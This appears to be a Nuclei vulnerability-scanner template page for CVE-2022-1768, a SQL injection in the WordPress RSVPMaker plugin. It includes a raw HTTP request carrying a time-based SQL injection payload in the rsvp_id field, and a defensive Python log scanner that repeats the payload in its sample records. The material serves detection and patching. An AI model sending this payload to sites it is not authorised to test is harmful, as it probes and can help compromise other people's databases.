WordPress RSVPMaker <=9.3.2 - SQL Injection
ID: CVE-2022-1768
Severity: high
Author: edoardottt
Tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications
Description
WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
id: CVE-2022-1768

info:
  name: WordPress RSVPMaker <=9.3.2 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
    - https://wordpress.org/plugins/rsvpmaker/
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1768
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1768
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1768
    cwe-id: CWE-89
    epss-score: 0.10537
    epss-percentile: 0.95006
    cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: carrcommunications
    product: rsvpmaker
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: body
        words:
          - '"payment_confirmation_message":'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b1944d02629d37bb1e9173f486d0574f9eddfa585ec4283f5aae505ae0dcf57702205c9aafa122cbbb15f21d17826f84046f9a07d429d6fabbf016bdec2d25798d12:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1768.yaml"
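
A defensive counterpart to the template's request and duration matcher, as an added example that is not part of the original page or the Nuclei project: it reviews logged requests to the same REST route and flags any rsvp_id that is not a plain integer. The record schema, the integer-only rule for rsvp_id and the default /wp-json prefix are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Route from the template; the last path segment is arbitrary.
# Assumption: the site uses the default /wp-json REST prefix.
ROUTE = re.compile(r"^/wp-json/rsvpmaker/v1/stripesuccess/[^/]+/?$", re.I)
INT_ID = re.compile(r"^\d{1,18}$")  # assumption: a valid rsvp_id is an integer
SLOW_SECONDS = 7.0                  # same threshold as the template's dsl matcher


def rest_path(uri):
    """Normalise both REST URL forms WordPress accepts to a /wp-json path."""
    parts = urlsplit(uri)
    alt = parse_qs(parts.query).get("rest_route")
    return "/wp-json" + alt[0] if alt else unquote(parts.path)


def classify(rec):
    """Return (verdict, reason) for one logged request (hypothetical schema)."""
    if rec["method"] != "POST" or not ROUTE.match(rest_path(rec["uri"])):
        return ("ignore", "not the stripesuccess route")
    # keep_blank_values so an empty rsvp_id is still inspected
    values = parse_qs(rec.get("body", ""), keep_blank_values=True).get("rsvp_id")
    if values is None:
        return ("ignore", "no rsvp_id parameter")
    if all(INT_ID.match(v.strip()) for v in values):
        return ("ok", "rsvp_id is numeric")
    if rec.get("duration", 0.0) >= SLOW_SECONDS:
        return ("alert", "non-numeric rsvp_id with delayed response")
    return ("suspicious", "non-numeric rsvp_id")


def scan(records):
    """Return (uri, verdict, reason) for every record that needs review."""
    results = [(r["uri"], *classify(r)) for r in records]
    return [row for row in results if row[1] in ("alert", "suspicious")]


# Constructed sample records, e.g. from a WAF audit log that keeps request bodies.
STRIPE = "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"
SAMPLE = [
    {"method": "POST", "uri": STRIPE, "duration": 0.2,
     "body": "rsvp_id=42&amount=1234&email=a%40example.org"},
    {"method": "POST", "uri": STRIPE, "duration": 7.3,  # body as in the template
     "body": "rsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext"},
    {"method": "POST", "uri": "/index.php?rest_route=/rsvpmaker/v1/stripesuccess/x",
     "duration": 0.1, "body": "rsvp_id=abc&amount=1"},
    {"method": "GET", "uri": "/wp-json/wp/v2/posts", "duration": 0.1, "body": ""},
]
```

Calling scan(SAMPLE) returns the second and third records; the same integer check can be enforced in front of the site until the plugin is updated to 9.3.3 or higher.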